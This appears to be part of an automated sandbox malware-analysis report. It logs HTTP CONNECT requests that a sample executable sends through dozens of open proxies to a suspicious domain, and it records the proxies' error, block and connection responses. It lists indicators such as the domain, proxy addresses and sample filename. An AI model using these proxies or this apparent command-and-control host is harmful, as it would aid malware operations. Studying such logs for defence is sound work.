                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      770192.168.2.45175450.63.12.33408386812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.124605894 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.178224087 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.179193974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.179007053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:46.178056955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      771192.168.2.452403211.222.252.18781936812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.124927044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      772192.168.2.452460185.219.133.10631286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.124927998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.348777056 CET327INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 166
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      773192.168.2.452138111.53.178.24973026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.129822016 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      774192.168.2.451722184.178.172.28152946812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.133512020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      775192.168.2.452486162.159.242.45806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.133755922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.221452951 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      776192.168.2.452487172.67.181.17806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.134711981 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.222676039 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      777192.168.2.45246951.210.223.930006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.137386084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      778192.168.2.45174945.11.95.16552116812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.153898001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.257092953 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.333584070 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.334790945 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:46.337369919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:58.334279060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:10.521871090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      779192.168.2.45246193.90.212.241536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.174247026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      780192.168.2.452472142.4.7.20341396812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.174252033 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      781192.168.2.45247372.206.181.10341456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.176311970 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      782192.168.2.452410103.163.51.254806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.182084084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      783192.168.2.4524328.213.128.6100036812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.187513113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.479095936 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      784192.168.2.452612129.226.90.344436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.209383011 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      785192.168.2.452511172.245.16.47156736812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.211221933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      786192.168.2.452616129.226.90.344436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.211850882 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      787192.168.2.45252045.12.30.231806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.221565008 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.313220978 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      788192.168.2.45246878.186.18.14236296812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.222521067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      789192.168.2.452489188.87.137.4531286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.234756947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.415987015 CET1286INHTTP/1.1 403 Forbidden
                                                                                                      Server: squid/3.5.28
                                                                                                      Mime-Version: 1.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                      Content-Length: 1002
                                                                                                      X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                      Content-Language: en
                                                                                                      X-Cache: MISS from ah_test
                                                                                                      Via: 1.1 ah_test (squid/3.5.28)
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 46 72 69 2c 20 32 33 20 46 65 62 20 32 30 32 34 20 30 38 3a 34 35 3a 32 32 20 47 4d 54 3c 2f 70 3e 0a 3c 2f 64
                                                                                                      Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://heygirlisheeverythingyouwantedinaman.com/*">https://heygirlisheeverythingyouwantedinaman.com/*</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Fri, 23 Feb 2024 08:45:22 GMT</p></d


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      790192.168.2.452272117.160.250.133806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.248128891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.816742897 CET303INHTTP/1.1 400 Bad Request
                                                                                                      Server: openresty
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 154
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      791192.168.2.452424218.75.102.19880006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.248137951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.975045919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      792192.168.2.452465103.146.137.910816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.248271942 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      793192.168.2.451785162.0.220.234532426812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.253503084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.257323027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      794192.168.2.45249231.170.22.12710806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.256570101 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      795192.168.2.452537209.97.150.16780806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.264383078 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.362755060 CET28INHTTP/1.1 400 Bad Request


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      796192.168.2.452559104.21.223.181806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.264427900 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.351713896 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:22 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      797192.168.2.452450122.155.165.19131286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:22.264575958 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
